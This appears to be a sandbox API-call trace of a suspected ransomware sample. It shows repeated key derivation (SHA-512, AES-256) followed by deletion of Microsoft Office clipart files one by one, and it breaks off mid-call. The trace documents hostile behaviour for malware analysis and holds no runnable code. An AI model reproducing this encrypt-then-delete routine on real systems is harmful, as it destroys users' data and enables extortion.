[0203.855] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0203.855] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.855] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad378) returned 1 [0203.855] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.855] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.855] wcslen (_String="\\\\?\\") returned 0x4 [0203.860] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF") returned 1 [0203.860] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00688_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00688_.wmf")) returned 1 [0203.861] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0203.861] wcslen (_String="OK") returned 0x2 [0203.861] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.861] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.861] CryptDestroyKey (hKey=0x9ad378) returned 1 [0203.861] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0203.861] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0203.864] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0203.864] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.864] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad438) returned 1 [0203.864] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.864] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.864] wcslen (_String="\\\\?\\") returned 0x4 [0203.868] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF") returned 1 [0203.868] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00693_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00693_.wmf")) returned 1 [0203.869] CryptDestroyKey (hKey=0x9ad378) returned 1 [0203.869] wcslen (_String="OK") returned 0x2 [0203.869] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.869] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.869] CryptDestroyKey (hKey=0x9ad438) returned 1 [0203.869] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0203.869] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0203.872] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0203.872] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.872] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad778) returned 1 [0203.872] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.872] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.872] wcslen (_String="\\\\?\\") returned 0x4 [0203.876] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF") returned 1 [0203.876] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01013_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01013_.wmf")) returned 1 [0203.877] CryptDestroyKey (hKey=0x9ad638) returned 1 [0203.877] wcslen (_String="OK") returned 0x2 [0203.877] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.877] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.877] CryptDestroyKey (hKey=0x9ad778) returned 1 [0203.877] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0203.877] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0203.880] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0203.880] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.880] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad778) returned 1 [0203.880] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.880] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.880] wcslen (_String="\\\\?\\") returned 0x4 [0203.895] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF") returned 1 [0203.895] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01015_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01015_.wmf")) returned 1 [0203.896] CryptDestroyKey (hKey=0x9ad138) returned 1 [0203.896] wcslen (_String="OK") returned 0x2 [0203.896] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.896] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.896] CryptDestroyKey (hKey=0x9ad778) returned 1 [0203.896] CryptDestroyHash (hHash=0x9ad738) returned 1 [0203.896] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0203.898] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0203.898] CryptHashData (hHash=0x9ad378, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.898] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad378, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad4b8) returned 1 [0203.898] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.898] CryptSetKeyParam (hKey=0x9ad4b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.898] wcslen (_String="\\\\?\\") returned 0x4 [0203.916] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF") returned 1 [0203.916] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01058_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01058_.wmf")) returned 1 [0203.917] CryptDestroyKey (hKey=0x9ad338) returned 1 [0203.917] wcslen (_String="OK") returned 0x2 [0203.917] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.917] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.917] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0203.917] CryptDestroyHash (hHash=0x9ad378) returned 1 [0203.917] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0203.919] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0203.919] CryptHashData (hHash=0x9ad778, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.919] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad778, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad478) returned 1 [0203.919] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.919] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.919] wcslen (_String="\\\\?\\") returned 0x4 [0203.925] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF") returned 1 [0203.925] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01065_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01065_.wmf")) returned 1 [0203.926] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0203.926] wcslen (_String="OK") returned 0x2 [0203.926] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.926] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.927] CryptDestroyKey (hKey=0x9ad478) returned 1 [0203.927] CryptDestroyHash (hHash=0x9ad778) returned 1 [0203.927] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0203.929] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0203.929] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.929] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad2b8) returned 1 [0203.929] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.929] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.929] wcslen (_String="\\\\?\\") returned 0x4 [0203.961] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF") returned 1 [0203.961] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01080_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01080_.wmf")) returned 1 [0203.962] CryptDestroyKey (hKey=0x9ad178) returned 1 [0203.962] wcslen (_String="OK") returned 0x2 [0203.962] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.962] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.962] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0203.962] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0203.962] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0203.964] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0203.964] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.964] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad138) returned 1 [0203.964] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.964] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.964] wcslen (_String="\\\\?\\") returned 0x4 [0203.978] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF") returned 1 [0203.978] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01242_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01242_.wmf")) returned 1 [0203.979] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0203.979] wcslen (_String="OK") returned 0x2 [0203.979] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.979] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0203.979] CryptDestroyKey (hKey=0x9ad138) returned 1 [0203.979] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0203.979] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0203.981] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449ec | out: phHash=0x1d4449ec) returned 1 [0203.982] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.982] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4449f0 | out: phKey=0x1d4449f0*=0x9ad7f8) returned 1 [0203.982] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0203.982] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0203.982] wcslen (_String="\\\\?\\") returned 0x4 [0204.006] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF") returned 1 [0204.006] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01291_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01291_.wmf")) returned 1 [0204.007] CryptDestroyKey (hKey=0x9ad438) returned 1 [0204.007] wcslen (_String="OK") returned 0x2 [0204.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.007] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.008] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0204.008] CryptDestroyHash (hHash=0x9ad838) returned 1 [0204.008] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0204.010] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0204.010] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.010] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad578) returned 1 [0204.010] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.010] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.010] wcslen (_String="\\\\?\\") returned 0x4 [0204.015] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF") returned 1 [0204.015] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01329_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01329_.wmf")) returned 1 [0204.017] CryptDestroyKey (hKey=0x9ad138) returned 1 [0204.017] wcslen (_String="OK") returned 0x2 [0204.017] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.017] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.017] CryptDestroyKey (hKey=0x9ad578) returned 1 [0204.017] CryptDestroyHash (hHash=0x9ad178) returned 1 [0204.017] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0204.019] CryptCreateHash (in: hProv=0x8e3660, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444884 | out: phHash=0x1d444884) returned 1 [0204.019] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.019] CryptDeriveKey (in: hProv=0x8e3660, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444888 | out: phKey=0x1d444888*=0x9ad678) returned 1 [0204.019] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.019] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.019] wcslen (_String="\\\\?\\") returned 0x4 [0204.025] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF") returned 1 [0204.025] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01461_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01461_.wmf")) returned 1 [0204.026] CryptDestroyKey (hKey=0x9ad738) returned 1 [0204.027] wcslen (_String="OK") returned 0x2 [0204.027] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.027] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.027] CryptDestroyKey (hKey=0x9ad678) returned 1 [0204.027] CryptDestroyHash (hHash=0x9ad338) returned 1 [0204.027] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0204.029] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0204.029] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.029] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad138) returned 1 [0204.029] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.029] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.029] wcslen (_String="\\\\?\\") returned 0x4 [0204.055] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF") returned 1 [0204.056] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01618_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01618_.wmf")) returned 1 [0204.057] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0204.057] wcslen (_String="OK") returned 0x2 [0204.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.057] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.057] CryptDestroyKey (hKey=0x9ad138) returned 1 [0204.057] CryptDestroyHash (hHash=0x9ad738) returned 1 [0204.057] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0204.060] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0204.060] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.060] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad1b8) returned 1 [0204.060] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.060] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.060] wcslen (_String="\\\\?\\") returned 0x4 [0204.065] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF") returned 1 [0204.065] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01759_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01759_.wmf")) returned 1 [0204.066] CryptDestroyKey (hKey=0x9ad178) returned 1 [0204.066] wcslen (_String="OK") returned 0x2 [0204.066] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.066] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.066] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0204.066] CryptDestroyHash (hHash=0x9ad438) returned 1 [0204.066] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0204.069] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0204.069] CryptHashData (hHash=0x9ad1f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.069] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad1f8, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad138) returned 1 [0204.069] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.069] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.069] wcslen (_String="\\\\?\\") returned 0x4 [0204.073] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF") returned 1 [0204.073] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01875_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01875_.wmf")) returned 1 [0204.080] CryptDestroyKey (hKey=0x9ad578) returned 1 [0204.080] wcslen (_String="OK") returned 0x2 [0204.080] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.080] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.080] CryptDestroyKey (hKey=0x9ad138) returned 1 [0204.080] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0204.080] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0204.083] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0204.083] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.083] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad4f8) returned 1 [0204.083] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.083] CryptSetKeyParam (hKey=0x9ad4f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.083] wcslen (_String="\\\\?\\") returned 0x4 [0204.130] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF") returned 1 [0204.131] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH01923_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh01923_.wmf")) returned 1 [0204.132] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0204.132] wcslen (_String="OK") returned 0x2 [0204.133] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.133] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.133] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0204.133] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0204.133] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0204.135] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a04 | out: phHash=0x1d444a04) returned 1 [0204.135] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.135] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d444a08 | out: phKey=0x1d444a08*=0x9ad1f8) returned 1 [0204.135] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.135] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.135] wcslen (_String="\\\\?\\") returned 0x4 [0204.140] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF") returned 1 [0204.140] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02155_.wmf")) returned 1 [0204.142] CryptDestroyKey (hKey=0x9ad538) returned 1 [0204.143] wcslen (_String="OK") returned 0x2 [0204.143] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.143] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.143] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0204.143] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0204.143] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0204.145] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0204.146] CryptHashData (hHash=0x9ad578, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0204.146] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad1b8) returned 1 [0204.146] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0204.146] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0204.146] wcslen (_String="\\\\?\\") returned 0x4 [0204.152] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF") returned 1 [0204.153] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH02166_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh02166_.wmf")) returned 1 [0204.154] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0204.157] wcslen (_String="OK") returned 0x2 [0204.157] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.157] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0204.157] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0204.157] CryptDestroyHash (hHash=0x9ad578) returned 1 [0204.157] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0204.159] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, 